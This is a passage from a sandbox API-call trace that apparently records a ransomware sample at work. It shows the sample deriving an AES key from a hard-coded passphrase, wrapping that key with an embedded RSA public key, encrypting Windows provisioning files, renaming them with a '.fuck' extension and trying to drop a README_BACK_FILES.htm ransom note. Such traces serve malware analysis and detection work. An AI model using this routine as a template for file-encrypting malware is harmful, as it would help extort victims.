nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.023] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0240.023] CryptEncrypt (in: hKey=0x28be958, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0240.023] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.023] CloseHandle (hObject=0xffffffff) returned 1 [0240.023] CloseHandle (hObject=0xffffffff) returned 1 [0240.023] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_0.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_0.provxml"), bFailIfExists=0) returned 0 [0240.023] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x0) returned 0 [0240.024] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_0.provxml.gsg")) returned 0 [0240.024] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_0.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_0.provxml.fuck")) returned 0 [0240.025] CryptDestroyHash (hHash=0x28be558) returned 1 [0240.025] CryptDestroyKey (hKey=0x28be958) returned 1 [0240.025] CryptReleaseContext (hProv=0x28d77e0, dwFlags=0x0) returned 1 [0240.025] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.025] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0240.025] GetLastError () returned 0x5 [0240.025] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_1.provxml")) returned 0x20 [0240.025] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x80) returned 0 [0240.026] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_1.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.027] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_1.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.027] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml.gsg", dwFileAttributes=0x2) returned 0 [0240.027] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28d7758) returned 1 [0240.030] CryptCreateHash (in: hProv=0x28d7758, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0240.030] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.030] CryptHashData (hHash=0x28be858, pbData=0x2856ed0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.030] CryptDeriveKey (in: hProv=0x28d7758, Algid=0x6610, hBaseData=0x28be858, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28be958) returned 1 [0240.030] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.030] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0240.030] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28d73a0) returned 1 [0240.030] CryptImportPublicKeyInfo (in: hCryptProv=0x28d73a0, dwCertEncodingType=0x1, pInfo=0x28cb068*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28cb098*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28cb0a0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2893b70) returned 1 [0240.031] CryptEncrypt (in: hKey=0x2893b70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0240.031] CryptEncrypt (in: hKey=0x2893b70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d7428*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28d7428*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0240.031] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d7428, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.031] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0240.031] CryptEncrypt (in: hKey=0x28be958, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0240.031] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.031] CloseHandle (hObject=0xffffffff) returned 1 [0240.031] CloseHandle (hObject=0xffffffff) returned 1 [0240.031] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_1.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_1.provxml"), bFailIfExists=0) returned 0 [0240.032] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x0) returned 0 [0240.032] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_1.provxml.gsg")) returned 0 [0240.032] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_1.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_1.provxml.fuck")) returned 0 [0240.033] CryptDestroyHash (hHash=0x28be858) returned 1 [0240.033] CryptDestroyKey (hKey=0x28be958) returned 1 [0240.033] CryptReleaseContext (hProv=0x28d7758, dwFlags=0x0) returned 1 [0240.033] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.033] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0240.033] GetLastError () returned 0x5 [0240.033] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_2.provxml")) returned 0x20 [0240.033] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml", dwFileAttributes=0x80) returned 0 [0240.034] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_2.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.034] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_2.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.035] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml.gsg", dwFileAttributes=0x2) returned 0 [0240.035] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28d7648) returned 1 [0240.037] CryptCreateHash (in: hProv=0x28d7648, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0240.038] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.038] CryptHashData (hHash=0x2893cf0, pbData=0x2856ed0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.038] CryptDeriveKey (in: hProv=0x28d7648, Algid=0x6610, hBaseData=0x2893cf0, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28be558) returned 1 [0240.038] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.038] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0240.038] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28d7758) returned 1 [0240.038] CryptImportPublicKeyInfo (in: hCryptProv=0x28d7758, dwCertEncodingType=0x1, pInfo=0x28cab88*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28cabb8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28cabc0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28be858) returned 1 [0240.038] CryptEncrypt (in: hKey=0x28be858, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0240.038] CryptEncrypt (in: hKey=0x28be858, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d70f8*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28d70f8*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0240.039] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d70f8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.039] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0240.039] CryptEncrypt (in: hKey=0x28be558, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0240.039] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.039] CloseHandle (hObject=0xffffffff) returned 1 [0240.039] CloseHandle (hObject=0xffffffff) returned 1 [0240.039] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_2.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_2.provxml"), bFailIfExists=0) returned 0 [0240.039] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml", dwFileAttributes=0x0) returned 0 [0240.040] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_2.provxml.gsg")) returned 0 [0240.040] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_2.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_2.provxml.fuck")) returned 0 [0240.041] CryptDestroyHash (hHash=0x2893cf0) returned 1 [0240.041] CryptDestroyKey (hKey=0x28be558) returned 1 [0240.041] CryptReleaseContext (hProv=0x28d7648, dwFlags=0x0) returned 1 [0240.041] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0240.041] FindClose (in: hFindFile=0x28bee18 | out: hFindFile=0x28bee18) returned 1 [0240.041] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\readme_back_files.htm")) returned 0xffffffff [0240.041] AreFileApisANSI () returned 1 [0240.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28d4d60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 117 [0240.041] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.042] GetLastError () returned 0x5 [0240.042] GetLastError () returned 0x5 [0240.042] FindNextFileA (in: hFindFile=0x28bf218, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.043] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.043] GetLastError () returned 0x5 [0240.043] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml")) returned 0x20 [0240.043] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml", dwFileAttributes=0x80) returned 0 [0240.043] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.044] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.044] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.044] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28d4d60) returned 1 [0240.047] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.047] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.047] CryptHashData (hHash=0x28bee18, pbData=0x2857498, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.047] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28bee18, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28be958) returned 1 [0240.047] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.047] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.047] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28d77e0) returned 1 [0240.048] CryptImportPublicKeyInfo (in: hCryptProv=0x28d77e0, dwCertEncodingType=0x1, pInfo=0x28cac58*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28cac88*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28cac90*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2893cf0) returned 1 [0240.048] CryptEncrypt (in: hKey=0x2893cf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.048] CryptEncrypt (in: hKey=0x2893cf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d7318*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28d7318*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.048] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d7318, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.048] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.048] CryptEncrypt (in: hKey=0x28be958, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.048] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.048] CloseHandle (hObject=0xffffffff) returned 1 [0240.048] CloseHandle (hObject=0xffffffff) returned 1 [0240.048] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml.gsg"), lpNewFileName="C:\\\\Users\\All 